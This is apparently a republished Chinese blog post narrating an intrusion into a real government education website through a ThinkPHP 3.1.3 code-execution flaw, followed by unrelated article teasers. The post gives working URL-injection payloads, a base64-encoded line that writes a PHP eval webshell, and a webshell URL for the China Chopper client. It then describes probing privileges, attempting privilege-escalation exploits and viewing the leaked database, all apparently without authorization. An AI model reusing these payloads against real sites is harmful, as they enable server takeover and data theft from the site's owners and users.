渗透某网站

这个很早就写了,没有修复就没有发出来。警察叔叔会找我,不过现在已经提交第三方平台修复了。

目标是:http://zsjh...du.gov.cn/index.php/Login

根据url,猜测可能是thinkphp框架。

随便在url后输入字符,发现

但是由于代码审计的实力有限,无法挖掘如此强大的新的通杀漏洞,尝试用之前的一波老漏洞~~

ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件

查看版本:

module/action/param1/${@print(THINK_VERSION)}

就是说,print( )里面可以执行我们的任意代码。如phpinfo()等其他函数:module/action/param1/${@phpinfo()}

我们可以直接利用fputs和fopen函数直接写木马出来了,构造语句:

fputs(fopen(base64_decode(“dmFmLnBocA==”),”w”),base64_decode(“PD9ldmFsKCRfUE9TVFtzdW5ueWdpcmxdKTs/Pg==”))

base64_decode(“dmFmLnBocA==”)解码后是 vaf.php

base64_decode(“PD9ldmFsKCRfUE9TVFtzdW5ueWdpcmxdKTs/Pg==”)解码后是 <?eval($_POST[sunnygirl]);?>

只要执行了 就能在该目录下生成一个vaf.php的一句话木马文件

但是操作的时候出现了问题

双引号被转义,然后我试了其他几种不用双引号写马的代码,都失败了

原因是 <> 尖括号等都被转义了 而exec()等系统命令执行函数写马的话是写不出的

但是中国人有菜刀啊~~

http://******/index.php/module/action/param1/${@print(eval($_POST[c]))}

whomai查看权限,uname –r查看内核版本

测试还发现存在GCC,简直爱它

在公司没有exp提权也是一种病… 然后我用了一个perl脚本全自动化查询exp。

挑了几个编译执行,失败。

不继续了~

看看泄漏的数据库,赶紧退出,敏感的东西,不想被网警叔叔查水表~

感谢cc表哥的提点和珍藏的exp。(你们猜我有没有提权成功)

亮点在提权上,可是发现没有截图,已经修复了。

估计某教育厅直接关了网站转到内网了~~

原文发布于微信公众号 - 晨星先生(MoXuanIT)

原文发表时间:2017-03-19

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

分析一个跨平台DDOS僵尸网络

从最近“恶意软件必须死”的帖子了解到一些关于DNS放大攻击相关的LINUX恶意软件样本。我对linux恶意软件的研究非常感兴趣,而且这个很特别,因为他有一个DD...

26380
来自专栏数据和云

当Java虚拟机遇上Linux Arena内存池

作者简介 刘韬,云和恩墨中间件服务交付团队专家 Java开发出身,10年WebLogic相关开发、运维工作经验,熟悉SOA、现代业务系统架构中各层组件,尤其擅长...

78370
来自专栏林德熙的博客

C# TimeSpan 时间计算

这时传入的是一个毫秒,但是很多小伙伴问,为什么是 5*1000 表示 5秒,他不知道我使用的是毫秒。

25310
来自专栏jeremy的技术点滴

TL-WR941D路由器刷OpenWRT备忘

380110
来自专栏二次元

新浪微博动态 RSA 分析图文+登录

二、抓包 还是遵从我们上一次的抓包流程,养成良好的习惯,这里就不多做说明。

11300
来自专栏后端技术探索

纯干货!-- Memcache详解

网址:http://www.cnblogs.com/xrq730/p/4948707.html

8210
来自专栏酷玩时刻

微信公众号开发之扫码支付

上一篇文章介绍了微信提供的那些支付方式以及公众号支付http://www.jianshu.com/p/cb2456a2d7a7

55530
来自专栏更流畅、简洁的软件开发方式

基于jQuery的ajax对WebApi和OData的封装我们还是先来看看要求在看看目标:思路封装方式

基于jQuery的ajax对WebApi和OData的封装   WebApi 的使用带来了一个显著的特点,对type有一定的要求。一般ajax的type无非就是...

278100
来自专栏企鹅号快讯

Python爬虫实战:爬取全站小说排行榜

喜欢看小说的骚年们都知道,总是有一些小说让人耳目一新,不管是仙侠还是玄幻,前面更了几十章就成功圈了一大波粉丝,成功攀上飙升榜,热门榜等各种榜,扔几个栗子出来: ...

458100
来自专栏用户2442861的专栏

工欲善其事,可能会有用的Clion技巧

半年前我开始用 Clion,顺带着写了一篇心得记录使用 CLion 的技巧,没想到发布在简书后浏览量还是挺高的,居然还获得了人生中第一笔真正的打赏,感动之余也...

81020

扫码关注云+社区

领取腾讯云代金券